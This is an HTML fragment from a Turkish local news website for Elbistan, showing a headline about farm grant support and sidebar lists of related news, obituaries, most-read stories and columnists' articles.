      <a href="https://www.elbistaninsesi.com/guncel/elbistan-ciftcisine-hibe-destekler-anlatilacak-h71850.html" title="Elbistan çiftçisine hibe destekler anlatılacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/11/elbistan_ciftcisine_hibe_destekler_anlatilacak_h71850_4c6e6.jpeg" alt="Elbistan çiftçisine hibe destekler anlatılacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan çiftçisine hibe destekler anlatılacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanspordan-4-gollu-galibiyet-h71883.html"  title="Elbistanspor’dan 4 gollü galibiyet">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/elbistanspordan_4_gollu_galibiyet_h71883_c4c66.jpg" alt="Elbistanspor’dan 4 gollü galibiyet" />
        <span>Elbistanspor’dan 4 gollü galibiyet</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/rabia-taskin-saglikli-beslenme-ve-diyet-danismanligi-merkezi-h71878.html"  title="Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/rabia_taskin_saglikli_beslenme_ve_diyet_danismanligi_merkezi_acildi_h71878_771e9.jpeg" alt="Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı" />
        <span>Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/eski-tedas-binasi-millet-konagi-oluyor-h71877.html"  title="Eski TEDAŞ binası ‘Millet Konağı’ oluyor">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/eski_tedas_binasi_millet_konagi_oluyor_h71877_2a67c.JPG" alt="Eski TEDAŞ binası ‘Millet Konağı’ oluyor" />
        <span>Eski TEDAŞ binası ‘Millet Konağı’ oluyor</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-uzakdogu-sporlarina-ozel-destek-h71876.html"  title="Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/elbistan_belediyesinden_uzakdogu_sporlarina_ozel_destek_h71876_4f5c5.jpg" alt="Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek" />
        <span>Elbistan Belediyesi’nden Uzakdoğu sporlarına özel...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/camilerde-normal-saf-duzenine-geciliyor-h71873.html"  title="Camilerde normal saf düzenine geçiliyor">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/camilerde_normal_saf_duzenine_geciliyor_h71873_995c1.JPG" alt="Camilerde normal saf düzenine geçiliyor" />
        <span>Camilerde normal saf düzenine geçiliyor</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/bos-kalan-kadrolara-yeniden-atama-yapilacak-h71872.html"  title="Boş kalan kadrolara yeniden atama yapılacak">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/bos_kalan_kadrolara_yeniden_atama_yapilacak_h71872_8a4bb.jpeg" alt="Boş kalan kadrolara yeniden atama yapılacak" />
        <span>Boş kalan kadrolara yeniden atama yapılacak</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/ciftci-kuraklik-destegi-odemelerini-bekliyor-h71871.html"  title="Çiftçi kuraklık desteği ödemelerini bekliyor">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/ciftci_kuraklik_destegi_odemelerini_bekliyor_h71871_762d2.jpg" alt="Çiftçi kuraklık desteği ödemelerini bekliyor" />
        <span>Çiftçi kuraklık desteği ödemelerini bekliyor</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/atilladan-akciger-kanseri-bilgilendirmesi-h71870.html"  title="Atilla’dan akciğer kanseri bilgilendirmesi">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/atilladan_akciger_kanseri_bilgilendirmesi_h71870_09cf7.jpeg" alt="Atilla’dan akciğer kanseri bilgilendirmesi" />
        <span>Atilla’dan akciğer kanseri bilgilendirmesi</span>
      </a>
    </div>
      </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="https://www.elbistaninsesi.com/images/sayfalar/8-Kasım-2021.jpg" title="Elbistanın Sesi - 08.11.2021 Manşeti" target="_blank"><img src="https://www.elbistaninsesi.com/images/sayfalar/thumb_8-Kasım-2021.jpg" alt="Elbistanın Sesi - 08.11.2021 Manşeti" /></a>
           </div>
  </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">99</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="last en-hidden en-visible"><a href="https://www.elbistaninsesi.com/guncel/elbistanli-isletmeci-silahli-saldirida-hayatini-kaybetti-h71595.html" title="Elbistanlı işletmeci silahlı saldırıda..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/elbistanli_isletmeci_silahli_kavgada_hayatini_kaybetti_h71595_c9cc3.jpg" alt="Elbistanlı işletmeci silahlı saldırıda..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/elbistanli-isletmeci-silahli-saldirida-hayatini-kaybetti-h71595.html" title="" ><span class="en-hit">1.</span> <strong>Elbistanlı işletmeci silahlı saldırıda...</strong> <span class="en-spot en-hidden">Antalya&#039;nın Alanya ilçesinde silahlı saldırıya uğrayan 35...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/19-yasindaki-genc-yasamina-son-verdi-2-h71633.html" title="19 yaşındaki genç yaşamına son..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/19_yasindaki_genc_yasamina_son_verdi_h71633_8d124.jpg" alt="19 yaşındaki genç yaşamına son..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/19-yasindaki-genc-yasamina-son-verdi-2-h71633.html" title="" ><span class="en-hit">2.</span> <strong>19 yaşındaki genç yaşamına son...</strong> <span class="en-spot en-hidden">Elbistan’da 19 yaşındaki genç, henüz bilinmeyen bir nedenle evinde...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/afsinli-profesor-kalbine-yenildi-h71740.html" title="Afşinli profesör kalbine yenildi" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/afsinli_profesor_kalbine_yenildi_h71740_e4ad2.jpg" alt="Afşinli profesör kalbine yenildi" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/afsinli-profesor-kalbine-yenildi-h71740.html" title="" ><span class="en-hit">3.</span> <strong>Afşinli profesör kalbine yenildi</strong> <span class="en-spot en-hidden">Zonguldak Bülent Ecevit Üniversitesi (BEÜ) Karadeniz Ereğli Turizm...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/sozlerini-eyyup-ceranin-yazdigi-kara-kiz-turkusu-izlenme-h71547.html" title="Sözlerini Eyyup Ceranın yazdığı..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/sozlerini_eyyup_ceranin_yazdigi_kara_kiz_turkusu_izlenme_rekoru_kirdi_h71547_ff994.jpg" alt="Sözlerini Eyyup Ceranın yazdığı..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/sozlerini-eyyup-ceranin-yazdigi-kara-kiz-turkusu-izlenme-h71547.html" title="" ><span class="en-hit">4.</span> <strong>Sözlerini Eyyup Ceran’ın yazdığı...</strong> <span class="en-spot en-hidden">Sözleri Elbistanlı işadamı ve şair-yazar Eyyup Ceran’ın yazdığı...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/sevgi-yanik-45-yasinda-h71814.html" title="Sevgi Yanık 45 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/sevgi_yanik_45_yasinda_h71814_eb0b4.jpg" alt="Sevgi Yanık 45 yaşında" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/sevgi-yanik-45-yasinda-h71814.html" title="" ><span class="en-hit">5.</span> <strong>Sevgi Yanık 45 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="https://www.elbistaninsesi.com/vefatlar/anma-hamit-bekci-h71684.html" title="Anma / Hamit Bekçi" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/anma_hamit_bekci_h71684_5aa4c.jpg" alt="Anma / Hamit Bekçi"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/anma-hamit-bekci-h71684.html" title="" ><span class="en-hit">1.</span> <strong>Anma / Hamit Bekçi</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/ergun-dedeler-62-yasinda-h71555.html" title="Ergün Dedeler 62 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/ergun_dedeler_h71555_38f5d.jpg" alt="Ergün Dedeler 62 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/ergun-dedeler-62-yasinda-h71555.html" title="" ><span class="en-hit">2.</span> <strong>Ergün Dedeler 62 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/munip-ozatay-81-yasinda-h71701.html" title="Münip Özatay 81 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/munip_ozatay_81_yasinda_h71701_a29cd.jpg" alt="Münip Özatay 81 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/munip-ozatay-81-yasinda-h71701.html" title="" ><span class="en-hit">3.</span> <strong>Münip Özatay 81 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/edibe-odacioglu-87-yasinda-h71859.html" title="Edibe Odacıoğlu 87 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/edibe_odacioglu_87_yasinda_h71859_fd158.jpg" alt="Edibe Odacıoğlu 87 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/edibe-odacioglu-87-yasinda-h71859.html" title="" ><span class="en-hit">4.</span> <strong>Edibe Odacıoğlu 87 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/leman-ozatay-76-yasinda-h71721.html" title="Leman Özatay 76 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/leman_ozatay_76_yasinda_h71721_00b5e.jpg" alt="Leman Özatay 76 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/leman-ozatay-76-yasinda-h71721.html" title="" ><span class="en-hit">5.</span> <strong>Leman Özatay 76 yaşında</strong> <span class="en-spot en-hidden">Leman Özatay 76 yaşında</span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="https://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/dunya-cocuk-kitaplari-haftasive-yaslara-gore-kitap-ozellikleri-makale,6378.html" title="DÜNYA ÇOCUK KİTAPLARI HAFTASIVE YAŞLARA GÖRE KİTAP ÖZELLİKLERİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/tuğba.jpg" alt="Tuğba Arıkan">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/101/tugba-arikan" title="Tuğba Arıkan">Tuğba Arıkan</a></h4>
              <a href="https://www.elbistaninsesi.com/dunya-cocuk-kitaplari-haftasive-yaslara-gore-kitap-ozellikleri-makale,6378.html" title="DÜNYA ÇOCUK KİTAPLARI HAFTASIVE YAŞLARA GÖRE KİTAP ÖZELLİKLERİ" >DÜNYA ÇOCUK KİTAPLARI HAFTASIVE YAŞLARA GÖRE KİTAP ÖZELLİKLERİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-23-makale,6377.html" title="TECRÜBE İLE SABİT-23-" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-23-makale,6377.html" title="TECRÜBE İLE SABİT-23-" >TECRÜBE İLE SABİT-23-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/albustanda-bir-karye-makale,6376.html" title="ALBUSTANDA BİR KARYE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="https://www.elbistaninsesi.com/albustanda-bir-karye-makale,6376.html" title="ALBUSTANDA BİR KARYE" >ALBUSTANDA BİR KARYE</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/cok-zor-makale,6375.html" title="Çok Zor" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yair_arYkan.jpg" alt="Şahin ARIKAN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/78/sahin-arikan" title="Şahin ARIKAN">Şahin ARIKAN</a></h4>
              <a href="https://www.elbistaninsesi.com/cok-zor-makale,6375.html" title="Çok Zor" >Çok Zor</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/cennet-senin-ozunde-gizli-makale,6374.html" title="CEN­NET SENİN ÖZÜN­DE GİZLİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="https://www.elbistaninsesi.com/cennet-senin-ozunde-gizli-makale,6374.html" title="CEN­NET SENİN ÖZÜN­DE GİZLİ" >CEN­NET SENİN ÖZÜN­DE GİZLİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/dogu-turkistan-dvasi-ve-mill-siyaset-makale,6373.html" title="DOĞU TÜRKİSTAN DÂVASI ve MİLLÎ SİYASET" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="https://www.elbistaninsesi.com/dogu-turkistan-dvasi-ve-mill-siyaset-makale,6373.html" title="DOĞU TÜRKİSTAN DÂVASI ve MİLLÎ SİYASET" >DOĞU TÜRKİSTAN DÂVASI ve MİLLÎ SİYASET</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/elbistan-haci-bektas-vel-ortaokulu-gibi-makale,6372.html" title="ELBİSTAN, HACI BEKTAŞ VELÎ ORTAOKULU GİBİ;" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/elbistan-haci-bektas-vel-ortaokulu-gibi-makale,6372.html" title="ELBİSTAN, HACI BEKTAŞ VELÎ ORTAOKULU GİBİ;" >ELBİSTAN, HACI BEKTAŞ VELÎ ORTAOKULU GİBİ;</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/duygu-davranis-ve-durusta-denge-makale,6367.html" title="DUYGU, DAVRANIŞ VE DURUŞTA DENGE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="https://www.elbistaninsesi.com/duygu-davranis-ve-durusta-denge-makale,6367.html" title="DUYGU, DAVRANIŞ VE DURUŞTA DENGE" >DUYGU, DAVRANIŞ VE DURUŞTA DENGE</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/elbistan-bestepe-koyu-makale,6366.html" title="   ELBİSTAN BEŞTEPE KÖYÜ;" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="https://www.elbistaninsesi.com/elbistan-bestepe-koyu-makale,6366.html" title="   ELBİSTAN BEŞTEPE KÖYÜ;" >   ELBİSTAN BEŞTEPE KÖYÜ;</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/katledilen-tum-kadinlarimizin-anisina-makale,6365.html" title="Katledilen tüm kadınlarımızın anısına…" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Makale.jpg" alt="Meltem Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/53/meltem-gocer" title="Meltem Göçer">Meltem Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/katledilen-tum-kadinlarimizin-anisina-makale,6365.html" title="Katledilen tüm kadınlarımızın anısına…" >Katledilen tüm kadınlarımızın anısına…</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/vefakarlik-makale,6361.html" title="VE­FA­KAR­LIK" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="https://www.elbistaninsesi.com/vefakarlik-makale,6361.html" title="VE­FA­KAR­LIK" >VE­FA­KAR­LIK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/recete-makale,6360.html" title="RE­ÇE­TE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="https://www.elbistaninsesi.com/recete-makale,6360.html" title="RE­ÇE­TE" >RE­ÇE­TE</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/alttan-gelen-var-mi-makale,6358.html" title="Alttan gelen var mı?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="https://www.elbistaninsesi.com/alttan-gelen-var-mi-makale,6358.html" title="Alttan gelen var mı?" >Alttan gelen var mı?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/dedikodu-yapma-gardas-makale,6354.html" title="DEDİKODU YAPMA GAR­DAŞ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="https://www.elbistaninsesi.com/dedikodu-yapma-gardas-makale,6354.html" title="DEDİKODU YAPMA GAR­DAŞ" >DEDİKODU YAPMA GAR­DAŞ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kim-demis-makale,6348.html" title="KİM DEMİŞ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="https://www.elbistaninsesi.com/kim-demis-makale,6348.html" title="KİM DEMİŞ" >KİM DEMİŞ</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/giden-gelmez-demek-ki-ora-gitmeye-deger-makale,6342.html" title="GİDEN GEL­MEZ DEMEK Kİ, ORA GİTMEYE DEĞER" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Mahir_BaYpYnar.jpg" alt="Mahir Başpınar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/57/mahir-baspinar" title="Mahir Başpınar">Mahir Başpınar</a></h4>
              <a href="https://www.elbistaninsesi.com/giden-gelmez-demek-ki-ora-gitmeye-deger-makale,6342.html" title="GİDEN GEL­MEZ DEMEK Kİ, ORA GİTMEYE DEĞER" >GİDEN GEL­MEZ DEMEK Kİ, ORA GİTMEYE DEĞER</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tutarsiz-ve-kisiligi-iplige-donenler-makale,6334.html" title="Tutarsız ve Kişiliği İpliğe Dönenler" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
